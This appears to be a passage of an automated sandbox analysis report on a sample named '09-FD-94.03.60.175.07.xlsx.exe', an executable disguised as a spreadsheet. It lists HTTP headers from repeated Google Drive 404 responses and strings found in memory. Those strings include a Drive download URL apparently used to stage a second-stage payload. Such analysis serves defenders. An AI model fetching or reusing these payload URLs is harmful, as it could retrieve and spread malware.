          Content-Type: text/html; charset=utf-8
          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
          Pragma: no-cache
          Expires: Mon, 01 Jan 1990 00:00:00 GMT
          Date: Mon, 16 Dec 2024 16:57:44 GMT
          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
          Content-Security-Policy: script-src 'nonce-_i5LuK7XBh8MWkD8_0OGOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
          Cross-Origin-Opener-Policy: same-origin
          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
          Content-Length: 1652
          Server: UploadServer
          Set-Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY; expires=Tue, 17-Jun-2025 16:57:44 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
          Content-Security-Policy: sandbox allow-scripts
          Connection: close
      Remaining twelve 404 responses (Date / X-GUploader-UploadID / script-src nonce):
          2   Mon, 16 Dec 2024 16:57:50 GMT   AFiumC4RiefLl7qtWaDPETfzM1yTb_9B2r_CaWGLI2NqmfUnyR6mkUk2LA-fv-MfJwtxQE-A   nonce-i4SZdSRTxK8HNjMx0AacNA
          3   Mon, 16 Dec 2024 16:57:55 GMT   AFiumC5T54kqLTEwunHgUPdaz6pUFI6X0YMkjxC5u4osWLlhWlHDDjC9O9ycICCF7yT4TGgB   nonce-t9AKfqNhO7sj8GIw9ym2EA
          4   Mon, 16 Dec 2024 16:58:01 GMT   AFiumC4vVjoIim0YxDVexvmkjvQhK_A4gqJrul5voHTdbvq5TMtaCfuehoNascKx_5m3Rz-a   nonce-xAPF-d_0sRNahErAT3pozQ
          5   Mon, 16 Dec 2024 16:58:06 GMT   AFiumC4ta_CaXtC6lLUGYMlr04C777LnIJVsBez3oHI8R02QCpL_I_bw84ygkOOCzszDTKFo   nonce-WU6cB3O4QjibIAQpY59wuw
          6   Mon, 16 Dec 2024 16:58:12 GMT   AFiumC79_XdwT5opJ7bv4SRS37aV6-L-mz42raFK0BeUYM8LjL7jm78EHlmU9VntEIdrP7Cc   nonce-_xJZkHHIdz5WlfP4Ganjkw
          7   Mon, 16 Dec 2024 16:58:18 GMT   AFiumC5lQPyB7BU66PM55OBj_X1vNiIetanHmA_JKuIcORGptSgHDW3qjNXQLp3lOXEUkgVC   nonce-B6wP_cAUUif2MF-q9-axJQ
          8   Mon, 16 Dec 2024 16:58:23 GMT   AFiumC5gplIk9aWtG2OizbMSZcYAmX3WVFDwhzKVatQHPnAMmpshVwSPhaPN4dm47Ju49C0u   nonce-CpXKikGZJSW4-Nslu1zAIw
          9   Mon, 16 Dec 2024 16:58:29 GMT   AFiumC5yshGBTP9KYwDoCluf2c407DFNsdUYXeuPHVLetEdD71YMf886mgV2_nGeWrbN7AZt   nonce-IRKCx1nAUszw3Y4rLk3B_Q
          10  Mon, 16 Dec 2024 16:58:34 GMT   AFiumC5y9Ls_0uWWG4a_qMg6miJaPIx57RaysFJKrU2LgzOhrfRGfCBussr-xIAURga4DwxR   nonce-kdrDnV6r3_lplXIAfzZ4HA
          11  Mon, 16 Dec 2024 16:58:40 GMT   AFiumC5kLglCmpi1M1uiYUtow5_xWVCFWt-dnI8y-hYx_XhV6FjvMrXJU7gxxu_s02NRgSw0   nonce-IKqxiRuJi9j75EgjhG78mw
          12  Mon, 16 Dec 2024 16:58:45 GMT   AFiumC5ySmzlUQfiaa6_KDXJESL2cDQjTswUyr6T0y8HWTZE2E7G7ojaLZkjquJ_AvCFNKoG   nonce-4wdzbC-IeVjHfY9zt4ovsg
          13  Mon, 16 Dec 2024 16:58:51 GMT   AFiumC4jSESVVtciyM1x2PPtN-ZBJgeonaSh7COd5VA-a5cO-_NnXpuQA9_MZ7M8kAz8gLls   nonce-n2sQLDlgYCtFP5QmtjCrLQ
          14  Mon, 16 Dec 2024 16:58:56 GMT   AFiumC4cw1ma4l2OPdRW8fIHKqb0UyXyALYjuHmlKrtbbgEgLdzGSuFI2krHbmmYQfbeKo3_   nonce-tyiYeSxCHk1zei-kV--uFg
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4KZ4odGlUd1G_LJyB_j53JW4-iYxCcwcMKaPELOkFSjyzfEAX-yHOXM8hP6LQLQMTSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:01 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-ywuEZEngkIzpTJnY2xpr8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6bP9KYGOA7GuGR_z2HfohlK_Nb9MWv3lb-qxFTmX8aVCz35umiZkK_ZloBPAE-5b8xContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:07 GMTContent-Security-Policy: script-src 'nonce-zEulElOHZOtj3UQvRdyyUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ozpAEHkuppLAQ9PArqfo4tPKnWOHgAuXm109UaJIcyanH9G9lPQIOH88n8MyDCsyJContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ODkTMDIOPuSNloouDxM17Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qPwmxkdT5dJy6YRHHg3n6lMNkesTwzBPhCD3RAsjeoCdrQcX4Ybh3vK09gLjSrtOTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-_rMKfn0T2OhGkyRljhcTXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6GhEO2Ai7sCU3mZfLPhYZMc-mWA1OS5TP9sBmXECW-Eq4KJtAWLFA_ioIH1eOq8vOBContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:59:23 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QhHo2obnTG8bAW07l18oUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000000.1483101932.0000000000409000.00000008.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000000.00000002.1592599968.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000000.1589553234.0000000000409000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=d
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2304015141.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1859716292.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/H4
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/U
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/k
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download5
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download9
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadU
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadq
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadt
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/kxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadtC
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=do
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/t
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759358149.0000000008D60000.00000004.00001000.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2751009047.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iK
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69iY
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2331421259.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413081299.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2574815814.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494127726.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358849652.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413036716.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494107292.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520839204.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2548177786.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440265722.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2520873930.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358896672.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2386530623.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2440247477.0000000007374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/y
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
